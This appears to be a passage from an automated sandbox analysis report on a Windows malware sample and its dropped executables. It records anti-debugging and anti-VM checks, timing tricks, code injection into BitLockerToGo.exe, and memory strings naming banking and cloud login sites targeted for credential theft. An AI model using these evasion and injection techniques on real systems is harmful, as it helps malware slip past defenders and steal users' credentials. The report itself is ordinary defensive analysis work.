Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5340E4B second address: 5340E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5340E5A second address: 5340E68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF06Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5340E68 second address: 5340E6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Special instruction interceptor: First address: A2DA18 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Special instruction interceptor: First address: BD4B73 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Special instruction interceptor: First address: C01E11 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Special instruction interceptor: First address: C60791 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\wJWNpO6lcm.exe

Code function: 0_2_053501F2 rdtsc

0_2_053501F2

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 1321	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 483	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 1040	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 8220	Thread sleep time: -58029s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6724	Thread sleep count: 1321 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6724	Thread sleep time: -2643321s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3428	Thread sleep count: 483 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3428	Thread sleep time: -14490000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6876	Thread sleep time: -540000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6724	Thread sleep count: 1040 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6724	Thread sleep time: -2081040s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe TID: 2012	Thread sleep time: -150000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\wJWNpO6lcm.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 11_2_00BA8ECE FindFirstFileExW,	11_2_00BA8ECE
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 11_2_00BA8F7F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	11_2_00BA8F7F
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00BA8ECE FindFirstFileExW,	12_2_00BA8ECE
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00BA8F7F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	12_2_00BA8F7F

Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe

Code function: 13_2_0514031E NtQueryInformationProcess,GetSystemInfo,

13_2_0514031E

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: rapes.exe, rapes.exe, 00000006.00000002.3834728349.0000000000CD6000.00000040.00000001.01000000.00000007.sdmp, a99d155ba8.exe, a99d155ba8.exe, 0000000D.00000002.3835484956.0000000000BB9000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: rapes.exe, 00000006.00000002.3835775379.0000000001177000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000002.3835775379.000000000114B000.00000004.00000020.00020000.00000000.sdmp, 2ea5560900.exe, 0000000C.00000002.3834907815.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp, 2ea5560900.exe, 0000000C.00000003.3765433231.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp, 2ea5560900.exe, 0000000C.00000003.3624912727.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp, 2ea5560900.exe, 0000000C.00000002.3834907815.0000000000CAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: a99d155ba8.exe, 0000000D.00000002.3836646008.0000000000F31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: rapes.exe, 00000006.00000002.3835775379.0000000001191000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: wJWNpO6lcm.exe, 00000000.00000002.1416869453.0000000000E26000.00000040.00000001.01000000.00000003.sdmp, rapes.exe, 00000001.00000002.1439184803.0000000000CD6000.00000040.00000001.01000000.00000007.sdmp, rapes.exe, 00000002.00000002.1446879341.0000000000CD6000.00000040.00000001.01000000.00000007.sdmp, rapes.exe, 00000006.00000002.3834728349.0000000000CD6000.00000040.00000001.01000000.00000007.sdmp, a99d155ba8.exe, 0000000D.00000002.3835484956.0000000000BB9000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 2ea5560900.exe, 0000000C.00000003.3661578776.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe

API call chain: ExitProcess graph end node

graph_12-42256

Source: C:\Users\user\Desktop\wJWNpO6lcm.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\wJWNpO6lcm.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\wJWNpO6lcm.exe

Code function: 0_2_053501F2 rdtsc

0_2_053501F2

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe

Code function: 12_2_00449B30 LdrInitializeThunk,

12_2_00449B30

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe

Code function: 11_2_00B96DE8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

11_2_00B96DE8

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_00AFDB60 mov eax, dword ptr fs:[00000030h]	6_2_00AFDB60
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_00B05FF2 mov eax, dword ptr fs:[00000030h]	6_2_00B05FF2
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 11_2_00BBF1B4 mov edi, dword ptr fs:[00000030h]	11_2_00BBF1B4

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe

Code function: 11_2_00BA490C GetProcessHeap,

11_2_00BA490C

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 11_2_00B96A2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00B96A2C
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 11_2_00B96DE8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00B96DE8
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 11_2_00B96DDC SetUnhandledExceptionFilter,	11_2_00B96DDC
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 11_2_00B9EF1E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00B9EF1E
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B96A2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00B96A2C
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B96DE8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00B96DE8
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B96DDC SetUnhandledExceptionFilter,	12_2_00B96DDC
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B9EF1E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00B9EF1E

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe

Code function: 11_2_00BBF1B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

11_2_00BBF1B4

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Memory written: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2AFB008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 41D000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 42A000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 42C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 42D000	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Code function: 6_2_00AD8700 ShellExecuteA,CreateThread,

6_2_00AD8700

Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe "C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe "C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Process created: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe "C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior

Source: a99d155ba8.exe, a99d155ba8.exe, 0000000D.00000002.3835484956.0000000000BB9000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: LProgram Manager
Source: rapes.exe, rapes.exe, 00000006.00000002.3834728349.0000000000CD6000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: UProgram Manager

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Code function: 6_2_00AF9AB5 cpuid

6_2_00AF9AB5

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: EnumSystemLocalesW,	11_2_00BA88AB
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: GetLocaleInfoW,	11_2_00BA88F6
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	11_2_00BA899D
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: EnumSystemLocalesW,	11_2_00BA41F7
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: GetLocaleInfoW,	11_2_00BA8AA3
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	11_2_00BA8238
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: EnumSystemLocalesW,	11_2_00BA8489
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: GetLocaleInfoW,	11_2_00BA3CFC
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	11_2_00BA8524
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: GetLocaleInfoW,	11_2_00BA87D6
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: EnumSystemLocalesW,	11_2_00BA8777
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: EnumSystemLocalesW,	12_2_00BA88AB
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: GetLocaleInfoW,	12_2_00BA88F6
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	12_2_00BA899D
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: EnumSystemLocalesW,	12_2_00BA41F7
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: GetLocaleInfoW,	12_2_00BA8AA3
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	12_2_00BA8238
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: EnumSystemLocalesW,	12_2_00BA8489
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: GetLocaleInfoW,	12_2_00BA3CFC
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	12_2_00BA8524
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: GetLocaleInfoW,	12_2_00BA87D6
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: EnumSystemLocalesW,	12_2_00BA8777

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Code function: 6_2_00AF93A7 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

6_2_00AF93A7

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

